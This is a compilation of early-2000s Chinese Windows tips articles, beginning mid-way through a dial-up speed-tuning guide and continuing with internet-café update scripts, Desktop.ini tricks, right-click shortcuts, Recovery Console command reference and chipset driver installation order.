系统虚拟专用网络适配器VPN一般是为访问企业网而设计的，对于一般用户基本上没有什么实用价值，而且它还是影响登录速度的原因之一，因此我们可以毫不犹豫地将其删除。操作步骤是：在拨号网络参数设置窗口中，选择“配置”标签，并从中选择“拨号网络适配器#2（VPN）”和“TCP/IP→拨号网络适配器#2（VPN）”，然后再点击“删除”按钮，就可以把指定的虚拟专用网络设备删除掉了。
3.改变“主网络登录”选项
“Microsoft友好登录”是系统的默认设置，但它同样延误了登录时间。改变上述默认设置的方法是在“网络”对话窗口中的“主网络登录”下拉列表框中选择“Microsoft网络用户”，再单击“确定”。如果在“主网络登录”中没有此项选择，可以通过添加客户来增加选项。
4.设置电话占线时重拨
拨号时遇到占线是常有的事情，而拨号时占线同样让用户付出时间代价。对此我们应对拨号占线做出选择。首先双击“我的电脑”图标，在随后打开的窗口中选择“拨号网络”，接着选择“连接”选项（如找不到请将“拨号网络”文件夹窗口最大化），接下来再选“设置”标签，然后在“重拨”区域的选项中做出你的选择。
5.关闭侦错模式
在“调制解调器”设置对话框的“连接”选项卡中，单击“高级”按钮，在“附加设置”文本框中键入“%C0”以关闭Modem的侦错模式，提高其速度。但该选项要求必须使用原厂商的Modem驱动程序，否则修改值无效。
6.让拨号窗口自动连接
每次拨号上网时，系统都会弹出拨号窗口提示用户输入合适的口令，因而影响了登录时间。如果用户在家中上网或者在自己认为是安全的地方上网，就可以在“连接到”窗口中选中“保存口令”或“自动连接”对话框，这样用户就不必在每次登录时重新输入口令，并等待确认过程，从而提高登录速度。
7.给系统端口设置合理的参数值
端口值设定太小会导致通信缓慢，从而降低上网速度，所以我们有必要给系统端口设置合理的参数值，设置时必须打开“系统属性”对话框，并从中找到“端口”)设置对话框。
接着再按照以下步骤检查每个COM端口。进入“端口设置”，将“波特率”的数值改为57600或115200。大多数Modem都设置在COM１或者2端口上。将这一设置改到最大值。同时在端口设置对话框中，请将Data Bits（数据位数）设为8，将Parity（奇偶校验）设为None，将Stop Bits（停止位）设为1，将Flow Control（流量控制）设为“硬件”。 接着再单击“高级”按钮，将里面所有的值都设为最大。如果出现问题，那就尝试着降低一些，或者选择“恢复为默认值”。另外，如果Modem使用的是COM3或COM4端口，则需要打开系统配置文件Win.ini进行设置。方法是：使用“记事本”打开Windows文件夹下的Win.ini，找到[Ports]节，将COM3:（或COM4:）=9600,n,8,1,x修改为115200,n,8,1,p。其中，最后一个参数为“x”时代表软件流控制（Software Flow Control），为“p”时则表示使用硬件流控制（RTS/CTS），为“”（空白）时则代表无流控制。
8.关闭安全检查设置项
拨号连接前系统默认的是要检查Internet上有无他人访问你的共享文件夹，为此也需要耽误一定的时间。为了节省这一部分时间，我们关闭该选项的方法是从“控制面板”中调出“Internet”对话窗口，在“连接”标签下去掉“在拨号前进行系统安全性检查”的钩号。
9.调整线路状态
如果电话线路质量不好，经常断线，也会严重影响拨号上网的速度。其具体解决办法是：单击“开始→设置→控制面板→调制解调器”，从Modem中选择“属性/连接页面/高级选项”，在附加设置中填入“S10=50”和“S25=200”，其中前者可以强制Modem在载波暂时丢失时保持5秒钟的连接状态，而后者则可以强制Modem在DTR（Data Terminal Ready数据终端就绪）信号瞬时无效时保持2秒的连接状态，从而可以避免线路传输质量不良时Modem发生断线故障。
10.通过选项减少上网连接时间
在缺省状态下，Windows 98需要激活对于拨号用户来说毫无用处的大量选项。默认设置中的“登录网络”，迫使系统寻找“Microsoft Windows网络”，找不到，连接就会超时；此外它还将无用的协议捆绑到拨号适配器上。要改变上述造成浪费连接时间的设置，关闭一些选项，即在弹出的对话框中，点击“服务器类型”选项卡，在“高级选项”区域，选掉“登录网络”前的钩号，在“所允许的网络协议”区域，只保留“TCP/IP”选项，再点击“确定”。
11.通过注册表来优化网络
微软并没有将Windows的拨号网络做最优化设置，它的网络参数缺省值是针对以太网来设定的，数据包、接收窗口等的大小都不太适合拨号上网方式，导致调制解调器不能发挥自己最大的潜能。所以我们还能够发掘这一部分的潜力为我们的网络再加速！因此，通过在注册表中重新优化设置，可以获得更好的访问速度。这种提速不仅对浏览网络有用，同时还影响到下载、收发邮件等操作，因为它是从充分利用硬件资源的角度入手，具体操作步骤如下：
在Window9X的桌面中选择开始按钮，并用鼠标单击运行命令，在弹出的对话框中填入REGEDIT（注册表编辑器）命令，单击确定后在注册表编辑器中依次展开以下键值：“/HKEY_ LOCAL_ MACHINE/Enum/Root/Net/000?”，并找到包含DeviceDesc字串，其值为“拨号网络适配器”的键，进入其子键bindings，记下其中的串值MSTCP\000?。
接着再依次展开键值“/HKEY_ LOCAL_ MACHINE/Enum/NetWork/MSTCP/000?”（?为上面找到的MSTCP\000?中的最后一个数字），同时找到Driver字串，记下其值NetTrans\000?。
然后在键值“/HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Class/NetTrans/000?”中（?为上面找到的NetTrans\000?中的最后一个数字）增加串值：MaxMTU=576 (Window9X 缺省值为1500字节，最大值为65535字节)，其中MaxMTU指的是最大的TCP/IP传输单元。应用程序把要传输的数据分割为较小的分组进行传输，标准的分组大小应为576字节。如果MaxMTU大于576，传输时则需要重新分组，降低了传输效率。Window9X的缺省值为1500，这是以太网上的标准的分组大小，如果不是通过以太网再接入INTERNET，则应改为576。
同样地在键值“/HKEY_ LOCAL_ MACHINE/System/CurrentControlSet/Services/Vxd/MSTCP”中增加以下串值 ：DefaultRcvWindow=5120 （Window9X缺省值为8192字节，最大值为65535字节）。其实DefaultRcvWindow就是接收这些数据的缓冲区，其大小应为512字节的整数倍。如DefaultRcvWindow太大的话，一个分组出错将导致整个缓冲区中的分组被丢弃并重发，增加了不必要的损失；如DefaultRcvWindow太小的话，缓冲区的大小低于到达的分组数据，将导致分组阻塞，降低了速度。最好是512字节的4～12倍，视Modem的最大速度而定。一般14.4K的Modem为2048字节、28.8K的Modem为4096字节、33.6K的Modem为6144字节、56K的Modem为8192字节。标准的TCP/IP分组大小是576字节，减去分组中固定为40字节大小的地址信息及24字节的其它信息，最多还包含512字节的数据。
DefaultTTL=255（Window9X缺省值为32，最大值为255），其中DefaultTTL表示TCP/IP分组的存活时间。为防止TCP/IP分组在INTERNET中被无限复制，分组中固定为40字节大小的信息区中包含了分组的存活信息。如果分组在INTERNET中的传输时间超过了分组的存活时间，分组将在传输中途被丢弃，加大分组的存活时间值可使分组在拥挤不堪的INTERNET中传输到更远的目的地。
NameSrvQueryTimeout=3000（Window9X缺省值为750毫秒，最大值为65535毫秒），NameSrvQueryTimeout是代表域名服务器超时计数。如果在计数值的时间内没有收到域名服务器的回应，则该域名服务器没有收到本机的请求。本机的请求将重发或作超时错误处理。适当调高其值可增大连接成功率。
12.交互使用多个不同ISP的拨号连接
拨号时一时难以拨通的情况时有发生，如果用户建立了几个不同ISP的拨号连接，就可以迅速从“连接到”的下拉列表中选择另外一个ISP拨号连接，这样用户就可以减少等待的时间。如果用户使用的是Windows NT操作系统，还可以实现交替选择拨号号码的功能。当主要拨号号码拨不通时，要快速点击“候选”按钮，选择ISP给用户提供的另外号码拨通上网。在Windows 98中也可以使用多个拨号号码，但使用过程比较繁，每次需要使用“添加新连接向导”来实现。
大家在拨号前按照上述的技巧，把有关拨号网络的参数设置调试好，然后再拨号试试，看看使用技巧前后的效果是否发生变化。如果此时还没有什么大的变化，可能是TCP/IP协议本身出了问题，这时只有重新安装TCP/IP协议了，不过在重新安装TCP/IP协议之前一定要把以前版本的那个彻底删掉！最后，笔者希望上面的小技巧能让大家的拨号速度上一个新台阶。

作者：周勇生
来源：大众软件


利用WINRAR自解压包进行网吧日常更新详解

《一键清理系统垃圾》

利用WINRAR自解压包进行网吧日常更新详解

    这几天有不少朋友在讨论利用WINRAR自解压包进行网吧客户机更新的方法,现将我常用的方法写一下,希望各位能够找到一丝灵感.

    工作环境:

    文件服务器:P4+850I+512RAMBUS+INTEL PRO 100+ 1台
    客户机:C41.7+256DDR+845D+8139　350台

    客户机设置：

    1、将所有快捷方式分类整理到文件夹中，如"网络游戏”、"本地游戏”、"办公学习”。

    2、将三个分类文件夹放到F盘根目录的"桌面快捷方式”目录中，然后在桌面上建立这三个分类文件夹的快捷方式。

    3、将"桌面快捷方式”目录打包做成自解压文件。例如：shortcut.exe

    4、自解压文件脚本为：
path=f:silent=1
overwrite=1
presetup=c:\windows\command\deltree.com /y f:\桌面快捷方式

    5、上传该自解压文件到某台服务器的共享目录。例如\\files\shortcut\shortcut.exe

    6、注册表中加入：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"!!!!!shortcut"="\\\\files\\shortcut\\shortcut.exe"
这样做的目的，是为了让该项在万象客户端启动之前启动，因为万象的启动项标题是!!!三个感叹号，所以排到最前。
不过这感叹号加不加的也无所谓，我没测试过，也许没用

    7、桌面背景图片，设置为\\\\files\\shortcut\\desktop.bmp(或者JPG)，这样更新服务器一个文件就行了。

    服务器设置：

    1、建立共享文件夹"shortcut”
    2、尽量用好一点的网卡，我用的是intel pro 100+
    3、服务器尽量接到主交换机上

    更新方法有三：

    第一、新游戏安装至客户机，从客户机做好快捷方式，将快捷方式文件上传到服务器上，加入shortcut.exe包中。

    第二、将游戏的更新补丁（30M以内的小更新）做成自解压文件，放到\\files\shortcut\update\中，做出自解压包的快捷方式,加入shortcut.exe包的相应目录中,这样.顾客执行的快捷方式实际上是服务器上的更新补??在更新完成后,自动运行游戏主程序.

    例子：（假设的）
MU的更新，2M的文件，MU安装目录为E:\MU\，自解压脚本为：

path=e:\musilent=1
overwrite=1
setup=mu.exe

    这样玩家执行的是服务器上的更新文件，更新完成后，自动打开游戏。

    第三、游戏安装到游戏共享服务器上，方法同第二种，将快捷方式加入到shortcut.exe包中。

    以上方法在以上环境正常使用了三个月,没有出现过异常情况.不要怕这样做会让机器启动速度慢下来，以我的经验看，绝对没有影响的，因为机器进入98之后到打开客户端锁定界面就要有一段时间，而这段时间内这个几百K的自解压程序早就运行完了。

    已经介绍给网盟几个朋友测试过,均大呼爽也.呵呵.


没法选中汉字输入法的原因

《一键清理系统垃圾》

没法选中汉字输入法的原因

    最近碰到一例奇特故障，症状：在记事本中选择汉字输入法，无论如何也不能选中汉字输入法。

    首先考虑输入法属性设置，检查并逐项重新设置，重新打开记事本，故障仍然存在
。会不会是输入法相关文件出错，删除汉字输入法，重新添加安装，再打开记事本，故障仍然存在。

    难道是记事本程序的问题？

    首先检查相关设置，若还不行那只能修复系统了。

    依次打开各菜单，发现“编辑”菜单下有“设置字体”项，发现选用了其它内码(例如日文、大5码等)的字体，改回宋体，单击确定，发现故障排除。

    分析原因：选取了其它内码的字体，而相应输入法不支持此内码，就会出现这种故障。


妙用Windows 9x的Desktop.ini文件

《一键清理系统垃圾》

妙用Windows 9x的Desktop.ini文件

    如果我问你一个问题，在Windows 9x系统中出现次数最多的文件名是什么，你也许一下子答不上来。那我来告诉你吧，它是Desktop.ini。在“Windows”、“Windows\System”、“Windows\Fonts”、“Windows\Tasks”、“My Documents”、“Program Files”、“Recycled”等文件夹中都有Desktop.ini文件。那么，Desktop.ini有什么作用呢？下面一起
来看一看。

    ★给文件夹添加注释

    用“记事本”在目标文件夹中建立一个Desktop.ini文件，内容如下：

    [.ShellClassInfo]

    InfoTip=你想显示的文字

    保存后，将该文件夹的属性设为“只读”。以后当你用鼠标指向这个文件夹的时候，就会显示出你加入的注释。

    ★改变文件夹的图标

    用“记事本”在目标文件夹中建立Desktop.ini文件，内容如下：

    [.ShellClassInfo]

    iconindex=n

    iconfile=图标文件路径及文件

    其中“iconindex=n”表示使用的图标是指定文件中的第几个图标，“iconfile=图标文件路径及文件名”表示文件夹使用的图标文件的路径及文件名，如：“iconindex=1，iconfile=C:\windows\regedit.exe”。保存文件后按F5键刷新，目标文件夹就变成了注册表文件的图标。

    ★隐藏文件夹内容

    复制Windows目录下的Desktop.ini文件到目标文件夹，用“记事本”建立一个超文本模板文件Folder.htt，内容如下：

    < html>

    < /html>

    单击“我的电脑→查看→按Web页查看”选项，然后将目标文件夹的属性设置为“只读”。再单击“刷新”按钮，怎么样，目标文件夹中的内容不见了吧！原来我们只是用一个空白的Html文件作为目标文件夹的模板遮住了文件夹中原来的内容，如果取消“按Web页查看”，目标文件夹中的内容就原形毕露了。如果你用其他有效果的Html文件作为Folder.htt超文本模板文件，目标文件夹就会在你打开时显示出不同的效果。比如显示一幅图片；开始播放音乐；跳出病毒警告等等。

    ★其他应用

    我们还可以用其他文件夹的Desktop.ini文件实现更多的妙用：进入Windows安装盘下的Recycled目录，将隐藏文件“Desktop.ini”复制到目标文件夹中，将这个文件夹的属性改为“只读”，再刷新一下，怎么样？目标文件夹变成了“回收站”！不过你不用担心，你只是看不见文件夹中原来的内容而已，回收站的操作不会影响，原有文件夹中的内容也不会被破坏！

    用同样的方法，我们可以进入Windows安装盘下的字体、公文包、IE临时文件等文件夹，将隐藏文件Desktop.ini复制到目标文件夹实现不同的效果，以上方法不会改变目标文件夹中原有的内容。


妙用右键 提高效率

《一键清理系统垃圾》

妙用右键 提高效率

《中国电脑教育报》吴新年

    在Word中编辑文档的时候，我们通常习惯用鼠标去点击常用工具栏上的“复制（剪切）”按钮完成复制，实际上单击鼠标右键也可以办到。在Office、Windows中熟练使用右键，不仅可以大大降低劳动强度，还可以达到许多意想不到的快捷效果。

    一、快速确定解压文件的目标目录

    我们用WinZip解压缩文件时，常需要在解压对话框中指定解压文件的目标目录，而如果我们用鼠标右键拖动ZIP文件到指定目录后松手，你会发现右键菜单中有两条解压命令，选择其中的“Extract to folder…”即可快速将该压缩文件解压到这个目录。用右键的方法还可以一次解压缩多个文件。

    二、提前确定查找范围

    在Windows中查找文件时，如果已经提前确定了查找范围，就可以直接在相应驱动器或文件夹的图标上单击鼠标右键，选择“查找”命令，你会发现这样打开的“查找”对话框中搜索范围已经被提前写好了。与此类似，需要在某个确定目录下杀毒时，也可直接在相应驱动器或文件夹的图标上单击鼠标右键，并选择其中的杀毒软件图标即可。

    三、快捷删除部分文档记录

    删除“开始”菜单中的文档记录有许多方法，使用注册表可以一劳永逸地删除文档项的全部记录，但如果你只想删除一部分文档记录，一般我们都会进入到C:\Windows\Recent文件夹下删除，但大家却忽略了一个更简单的方法：单击“开始”菜单，指向其中的“文档”项，在其级联菜单中找到需要删除的文档名，右键单击并选择“删除”命令即可。

    四、给“程序”菜单排序

    大家可能都有过这样的感受：调用“开始→程序”菜单里的程序时，因为该菜单里的程序没有按顺序排列，所以查找时往往有点盲目，其实你只需单击“开始→程序”，然后指向“程序”菜单中的任何一个程序项并单击鼠标右键，选择快捷菜单中的“按名称排序”命令，下次查找程序时就方便多了。


Windows XP 控制台命令详解 - 目录和文件操作命令

《一键清理系统垃圾》

Windows XP 控制台命令详解 - 目录和文件操作命令

2002-02-22　　　作者：

编者语：
    Windows XP（包括 Windows 2000）的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结，这次辛苦老范给我们整理了这份实用的秘笈。

    Attrib

    更改单个文件或目录的属性。该命令设置或删除指派给文件或目录的只读、系统、存档、隐藏以及压缩属性。

    含有下列参数的 attrib 命令仅当使用故障恢复控制台时才可用。含有不同参数的 attrib
命令可在命令提示符中使用。

    attrib [ +r|-r] [ +s|-s] [ +h|-h] [ +c|-c] [ [ drive:] [ path] filename]

    参数

+r 设置只读属性。
-r 清除只读属性。
+s 设置系统属性。
-s 清除系统属性。
+h 设置隐藏属性。
-h 清除隐藏属性。
+c 设置压缩属性。
-c 清除压缩属性。

    [ [ drive:] [ path] filename]

    指定要处理的目录或文件的位置和名称。可以一次只更改一个文件，也可以更改整个目录。

    注意：可以用一个命令更改一个文件或目录的多个属性。

    Batch

    执行在文本文件中指定的命令。batch 命令仅在使用故障恢复控制台时才可用。故障恢复控制台可以从安装 CD 中启动。

    batch input_file [ output_file]

    参数

    input_file

    指定包含要执行的命令列表的文本文件。Input_file 可以由驱动器号和冒号、目录名、文件名或它们的组合构成。

    output_file

    如果指定，则在命名文件中存储命令输出。如果没有指定，输出将显示在屏幕上。

    范例

    下例将执行批处理文件 C:\Jobs\Find.txt 并将输出存储在文件 C:\Jobs\Results.txt 中：

    batch c:\jobs\find.txt c:\jobs\results.txt

    注意：批处理文件不能包含嵌套的 batch 命令。

    Chdir（Cd）

    显示当前目录的名称，或更改当前的文件夹。

    含有下列参数的 chdir 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chdir 命令。

    chdir [drive:] [path] [ ..]

    或者

    cd [drive:] [ path] [ ..]

    参数　　无

    如果不带任何参数，chdir 将显示当前驱动器和文件夹的名称。只与驱动器号一起使用（例如 cd C:），chdir 将显示指定驱动器上的当前目录。

    [ drive:] [ path]

    指定要改到的驱动器（如果不是当前驱动器）和目录。

    [ ..]

    指明要改到父文件夹。在 chdir 和两个句点之间插入一个空格。

    注意

Chdir 将空格视作分隔符。用引号将包含空格的目录名扩起来。例如：
cd "driver cache"

Chdir 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。
    Copy

    将单个文件复制到其他位置。含有下列参数的 copy 命令仅在使用故障恢复控制台时才可用。

    可在命令提示符下使用带不同参数的 copy 命令。

    copy source [ destination]

    参数

    source

    指定要被复制的文件的位置和名称。Source 可由驱动器号和冒号、目录名、文件名或组合所组成。

    destination

    指定要复制到其中的文件或文件集的位置和名称。Destination 可以由驱动器号和冒号、文件夹名、文件名及组合而组成。

    注意

源可以是可移动媒体、当前 Windows 安装的系统目录中的任何目录、驱动器的根目录、本地安装源或 Cmdcons 目录。
目标可以是除可移动媒体以外的任何与源相同的位置。如果没有指定目标，则默认为当前目录。
Windows 安装 CD 中的压缩文件在复制过程中解压缩。
Copy 不支持通配符。
    Delete（Del）

    删除单个文件。含有下列参数的 delete 或 del 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 delete 或 del 命令。

    delete [ drive:] [ path] filename

    或者

    del [ drive:] [ path] filename

    参数

    [ drive:] [ path] filename指定要删除的文件的位置和名称。

    注意

Delete 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。
    Dir

    显示目录中的文件和子目录列表。含有下列参数的 dir 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 dir 命令。

    dir [ drive:] [ path] [ filename]

    参数

    [ drive:] [ path]

    指定要查看列表的驱动器和目录。

    [ filename]

    指定要查看列表的特定文件或一组文件。可以使用多个文件名。文件名可以用空格、逗号或分号隔开。可以在 filename 参数中使用通配符（? 和 *）显示一组文件。

    Dir 还列出磁盘的卷标和序列号，以及所列文件的数目，累计大小和磁盘上剩余的可用空间（以字节计）。对于每个文件和子目录而言，dir 列出文件的扩展名、文件字节数、文件的最后修改日期和时间以及下列文件属性（如果可用）：

缩写 属性
d 目录
h 隐藏文件
s 系统文件
e 加密
r 只读
a 存档文件
c 已压缩
p 重新分析点

    注意：

    Dir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。

    Expand

    从压缩文件中提取文件。通过该命令可从 .cab 文件或压缩文件中提取驱动程序文件。

    含有下列参数的 expand 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 expand 命令。

    expand source [ /F:filespec}] [ destination] [ /d] [ /y]

    参数

    source

    指定要展开的文件。如果源文件只包含一个文件，请使用该选项。source 可由驱动器号和冒号、目录名、文件名或组合所组成。不能使用通配符。

    /f:size

    如果源文件包含多个文件，指定要提取的文件的名称。可以对要提取的文件使用通配符。

    destination

    指定提取文件或每个单独文件的目标目录和（或）文件名。

    /d

    列出 CAB 文件中包含的文件而不展开或提取。

    /y

    在展开或提取文件时不出现覆盖提示。

    范例

    下例将从安装 CD 上的驱动程序 CAB 文件中提取 Msgame.sys 文件并将其复制到 C:\Windows\System\Drivers：

    expand d:\i386\driver.cab\f:msgame.sys c:\windows\system\drivers

    下例将展开压缩文件 Access.cp_：

    expand d:\i386\acces.cp_c:\windows\system32\access.cpl

    下例将列出安装 CD 上的驱动程序 CAB 文件中的所有文件。

    expand /d d:\i386\driver.cab

    要点

驱动程序 CAB 文件包含成千上万的文件，其中包括由 Windows 提供的大部分驱动程序。将所有文件从 CAB 文件展开到硬盘上需要花较长的时间和大量的磁盘空间。建议 仅从该文件中提取需要的文件。
    注意

如果没有指定目标，文件将被复制到当前目录。
不能将软盘驱动器或 CD-ROM 等可移动媒体指定为目标。
    Mkdir（md）

    创建目录或子目录。含有下列参数的 mkdir 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 mkdir 命令。

    mkdir [ drive:] path

    或者

    md [ drive:] path

    参数

    drive:

    指定要创建新目录的驱动器。

    path

    指定新目录的名称和位置。不能使用通配符。

    注意

Mkdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。
    Rename（Ren）

    更改单个文件的名称。含有下列参数的 rename 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 rename 命令。

    rename [ drive:] [ path] filename1 filename2

    或者

    ren [ drive:] [ path] filename1 filename2

    参数

    [ drive:] [ path] filename1

    指定要重新命名的文件的位置和名称。不能使用通配符。

    filename2

    为文件指定新的名称。重新命名文件时不能指定新的驱动器或路径。

    Rmdir（Rd）

    删除目录。含有下列参数的 rmdir 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 mdir 命令。

    rmdir [ drive:] path

    或者

    rd [ drive:] path

    参数

    [ drive:] path

    指定要删除的目录的位置和名称。不能使用通配符。

    注意

目录必须为空否则命令失败。
Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。
    Type

    显示文本文件的内容。使用 type 或 more 命令查看文本文件而不修改文件。含有下述参数的 type 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 type 命令。

    type [ drive:] [ path] filename

    或者

    more [ drive:] [ path] filename

    参数

    [ drive:] path] filename

    指定要查看的文件的位置和名称。

    如果使用 NTFS 驱动器而且文件名包含空格，则必须用引号（"）将文件名引起来。

    More

    显示文本文件的内容。使用 more 或 type 命令查看文本文件而不修改文件。含有下列参数的 more 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 more 命令。

    more [ drive:] [ path] filename

    或者

    type [ drive:] [ path] filename

    参数

    [ drive:] path] filename

    指定要查看的文件的位置和名称。

    如果使用 NTFS 驱动器，而且文件名包含空格，则必须用引号（"）将文件名引起来。


你真的会安装驱动顺序吗？

《一键清理系统垃圾》

你真的会安装驱动顺序吗？

IT业的技术员中流传着这样一种说法：“驱动程序不算程序，没有却真要命”。这充分说明了驱动程序的重要性。在科技发展日新月异的今天，每过几天就会有新硬件上市，而好几个月，甚至是2～3年才更新一次的操作系统（不使用Windows Update）自带的驱动程序库是无法跟上这种发展步伐的，这就需要生产厂商不断开发第三方的驱动程序。对于使用者来说，想要让自己的设备正常工作，就必须给它安装正确的驱动程序，要如果想要让它发挥出更好的性能，我们就需要更恰当、更好地、有顺序地安装驱动程序。
让我们假想一个场景——从一个纯净的操作系统开始，逐步安装各设备的驱动程序直到所有硬件都能正常工作。这样，通常需要安装的便会有主板芯片组驱动更新、IDE控制器驱动程序、显示卡驱动程序和声卡驱动程序等，有时候还需要安装DirectX等扩展API和操作系统的服务升级包（譬如Windows 2000 Sevice Pack3等）。那么，怎样安装才算正确呢？除了挑选合适的驱动程序之外，另一个关键在于安装顺序，采用正确的顺序来安装驱动程序，不仅可以提高系统效能，还能提高相同硬件环境下的系统稳定性。特别是芯片组的驱动应该首先安装，因为只有该驱动被正确安装后，操作系统才能正确识别一些系统设备，其他的设备驱动才能顺利安装。
在实战驱动安装顺序中，我们可以根据Intel、VIA、SiS和ALi全球四大主板芯片组厂商各自的主流芯片组驱动分别来讲。
1.Intel
毫无疑问，Intel是主板芯片组和CPU领域的领袖，他们所开发的主板芯片组搭配上自己的CPU给人的感觉不错，稳定性高、Bug少、各方面效能都还不错，而且由于“Winter联盟”的关系，Microsoft的Windows系列操作系统对Intel芯片组的支持一向是最好的，因此除了正常的驱动外几乎没有什么补丁。下面是Intel 8xx系列芯片组主板驱动程序的正确安装顺序(以Windows 98SE为例)。
Intel Chipset Softwre Installation Utility
由于Windows 98SE推出比较早，无法正确识别Intel当前主流的i8xx系列芯片组，因此必须先安装这个驱动以确保操作系统能够正确识别系统设备和正确用它们的功能。如果这一驱动程序没有被安装，操作系统将对即将被调用的芯片组和外围设备一无所知，更谈不上充分发挥性能了。就拿显示和图形子系统来说吧，如果没有正确安装Intel Chipset Software Installatiion Utility，直接导致的严重后果将是AGP Bridge无法使用。AGP Bridge集成在芯片组中的内存控制中心(Memory Controller Hub)内，是主板与AGP显卡之间进行通信的桥梁。如果AGP Bridge功能没有被开启，就算正确安装了显示卡驱动程序，图表子系统的整体性能也将大打折扣。
Intel Ultra ATA Storage Driver/Intel Application Accelerator
安装Intel Ultra ATA Storage Driver是为了开启IDE控制器对ATA 66/100设备及其传输规范进行控制和管理的功能。除了让操作系统正确识别82801BA IDE控制器外，该控制程序也是在Windows 98SE中开启DMA(Direct Memory Access，直接内存访问)功能的关键，而在默认状态下，DMA传输模式在Windwos 98SE中是被关闭的，就算你的IDE设备支持DMA传输模式也是如此。
IAA(Intel Application Accelerator，Intel应用程序加速器)最近被炒得火热，Intel称这款Application Accelerator除了能够减少10%～20%的系统启动时间之外，还能加快所有应用程序5%～10%的执行效率(如图)。作为一款增强型的IDE控制器驱动，它适用于ICH2或更新版本的I/O Control HUB，而该芯片被包括在大多数的i8xx芯片组系统中，也就是说，大多数使用Intel 8xx芯片组主板的用户都能够利用它免费提升系统性能。此外，使用Pentium 4系统的用户能够从这款加速驱动中获得更多的好处。
DirectX
由于硬件更新的缘故，目前的主流显示卡均支持DirectX 7、DirectX 8甚至DirectX 9，而Windows 98SE附带的DirectX6.1，显然无法让它们充分发挥作用。由于显示卡驱动程序是以DirectX为基础的，因此必须在先于显示卡驱动程序之前安装DirectX。由于现在新购的计算机有相当一部分使用的423或者478脚的奔腾4的CPU，而CPU的SSE2指令集恰恰在DirectX 8下才能被良好地调用；同时加上图形处理器(GPU)的硬件加速也与DirectX有关，所以对于DirectX的安装也是比较讲究的。
其它设备驱动程序
需要注意的是，在后期驱动安装中(如声卡)，一些版本比较旧的驱动程序会将某些系统文件或EirectX文件覆盖为旧版而导致设备无法正常工作的情况(譬如在安装某些老版的ATI显卡驱动之后，某些AC’97声卡不能发声)。此时应该重新安装一遍DirectX。
2.VIA(威盛)
对于采用VIA芯片组的系统，其驱动程序的基本安装过程同样大致可分为3个步聚：首称是安装VIA 4 in 1芯片组补丁；然后是DirectX；最后是IDE接口控制器驱动程序和其它设备驱动程序，我们同样以纯净的Windows 98SE为例说明此问题。
VIA 4 in 1
小知识
VIA 4 in 1驱动包含符合ATAPI接口规范的IDE接口控制器驱动程序、AGP VxD Driver(AGP接口驱动程序)、IRQ路由端口驱动程序及VIA INF更新。由于兼容性问题会随新产品的增加而增加，同时基于对自身性能优化的考虑，所以VIA 4 in 1的版本更新比较频繁，许多兼容性问题和死机问题往往是4 in 1驱动程序与硬件不匹配造成的。
VIA(威盛)为基于VIA芯片组的主板提供4 in 1芯片组驱动已经有很长时间了。由于微软对第三方芯片组厂商通常仅提供非常有限的支持，因此除Intel外的芯片组制造商不得不为自己的产品自行开发并发布补丁程序，VIA也不例外。该补丁除解决VIA芯片组与Windows操作系统之间可能出现的一些兼容性问题外，还使得Windows能够正确识别VIA芯片组集成的系统设备。
典型故障实例分析
VIA芯片组以往总是给人留下一些兼容性较差的印象。比如与某些特定型的声卡，显卡兼容性不佳等，而实际上这些问题都能够通过安装4 in 1驱动或升组主板BIOS来获得解决。因此VIA的4 in 1驱动也被人们称之为4 in 1“补丁”。那么如今的VIA芯片组主板是否还存在这些固有的问题呢?
以前在某些使用VIA芯片组的主板上安装使用基于Aureal 8820音效芯片的声卡(如帝盟S90)时，当进入Windows 98桌面时就死机。这个故障曾经是VIA兼容性不佳的最好例子。事实上，VIA已经就以前的这些兼容性问题作了一些修正，然而VIA 4 in 1驱动仍需安装，因为它为我们带来了不小的性能增益。从VIA 4 in 1驱动在Windows 98平台下的表现可以看出，驱动程序在安装后主板性能得到了完全的发挥，尤其是在实际应用中，效果更为明显，看来VIA 4 in 1驱动并不仅仅是为了解决兼容性问题而存在，而是实实在在能为我们带来了性能的提升。
既然VIA以前的兼容性问题已经在新的芯片组上得到了一定的修正，那么是不是就可以说VIA的芯片组已经不需要安装VIA 4 in 1驱动了呢?答案是否定的，驱动仍需安装，因为它为我们带来了不小的性能提升。看来，VIA 4 in 1驱动并不仅仅是为了解决兼容性问题而存在。
IDE控制器驱动程序
VIA的IDE Miniport Driver与IDE Filter Driver是VIA开发的两款IDE控制器驱动，而前者必须单独安装。IDE Miniport Driver驱动并不随4 in 1驱动默认安装。根据VIA的官方资料，它在下列情况下推荐安装：1.拥有Zip驱动器，并且主板南桥芯片是686B；2.Windwos 2000系统下，使用ATA100硬盘，没有安装Service Pack 1；3.在Windwos 2000和Windows XP系统下，使用ATA133硬盘，它也同时支持微软的从Windows 98开始的任何一个Windows操作系统。VIA IDE Miniport Driver能够巧妙地校正设备出现I/O错误的情况。它能够由高到低的逐级自动递减设备的传输模式级别至正确，这里所谓的传输模式级别其实就是我们经常说到的UDMA 100、UDMA 66、UDMA、DMA以及PIO模式。而VIA IDE Filter Driver就是所谓的过滤驱动，它主要被用来确定系统常规驱动程序的高位/低位层，监控常规驱动程序的特定情形。VIA IDE Filter驱动为Windows 95/98/2000/me/XP等系统所支持，是除NT外的所有微软操作系统的缺省安装驱动。
DirectX
对于VIA的硬件平台，DirectX的重要性更比Intel平台重要。
